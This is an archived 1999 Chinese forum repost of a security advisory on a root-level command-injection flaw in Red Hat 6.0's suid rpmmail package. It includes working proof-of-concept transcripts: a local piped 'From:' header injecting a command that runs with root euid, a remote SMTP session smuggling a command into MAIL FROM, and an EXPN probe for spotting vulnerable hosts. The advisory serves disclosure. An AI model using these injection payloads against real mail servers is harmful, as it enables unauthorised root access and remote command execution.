精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>Red Hat 6.0最新rpmmail本地/远程漏洞

主题:Red Hat 6.0最新rpmmail本地/远程漏洞
发信人: [email protected]()
整理人: williamlong(1999-11-17 16:48:14), 站内信件

Red Hat 6.0最新rpmmail本地/远程漏洞

  在Red Hat 6.0的附加CD中,有一个软件包,叫作rpmmail package。安装后的
rpmmail存在严重的ROOT级
的漏洞。此漏洞可能会使远程/本地的普通用户获得ROOT权,或以"nobody"身份远
程执行任意指令。

  给rpmmail@vulnerablehost发送一封e-mail,可以使/home/rpmmail/rpmmai
l (默认设置为suid root,能
由.forward远程执行)向system(3)执行任何你所希望的指令。指令的执行并不一
定需要ROOT权限,因为bash's
handling of euid != uid of caller。虽然system(3)调用/bin/sh -c,但在某
些linux系统的默认设置下,
比如SuSE 6.2,其被联结至/bin/bash v2。从system(3)连机手册可知,此漏洞在
/bin/sh为bash version 2的
系统中无效,因为自bash version 2开始,/bin/sh在启动时,取消了原来所具有
的特殊权限。因此,一些安
装了rpmmail的系统存在 远程/本地ROOT 漏洞。所有没有特殊权限others组的用
户都可以远程执行指令。

  本地漏洞如下:

  /bin/sh is linked to /bin/bash (default SuSE 6.2 behavior:
  bash-2.03$ ls -la /bin/sh
  lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
  bash-2.03$ cat /etc/SuSE-release;uname -a;id
  SuSE Linux 6.2 (i386)
  VERSION = 6.2
  Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown

  uid=100(xnec) gid=100(users) groups=100(users)
  bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c b
ah
  Could not open config file!
  sh: Y: command not found
  uid=100(xnec) gid=100(users) groups=100(users)
  Could not open acknowledge file!
  bash-2.03$

  ----

  After linking /bin/sh to /bin/ksh instead:

  bash-2.03$ ls -la /bin/sh
  lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
  bash-2.03$ cat /etc/SuSE-release;uname -a;id
  SuSE Linux 6.2 (i386)
  VERSION = 6.2
  Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown

  uid=100(xnec) gid=100(users) groups=100(users)
  bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c b
ah
  Could not open config file!
  sh: Y: not found
  uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(
users)
  Could not open acknowledge file!
  bash-2.03$

  远程漏洞如下:
  bash-2.03$ telnet localhost 25
  Trying 127.0.0.1...
  Connected to localhost.
  Escape character is '^]'.
  220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:
31:13 -0500
  (CDT)
  MAIL FROM: ;/command/to/execute;
  250 <;/command/to/execute;> ... Sender Okay
  RCPT TO: rpmmail
  250 <rpmmail> ... Recipient Okay
  data
  354 Enter mail, end with "." on a line by itself

  250 Mail accepted
  quit

  对有此项漏洞主机的确认非常简单,可以通过EXPN命令来校验.forward是否
存在:
  220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:
38:44 -0500
  (CDT)
  EXPN rpmmail
  250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"

--
欢迎大家常来回合策略  宗教信仰坐坐。
欢迎光临
魔法师学院http://wwwmagic.126.com
    
*    *    *    *    *
       
无挂碍故无有恐怖
                --
DOS--
                                      

※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.250.155]

[关闭][返回]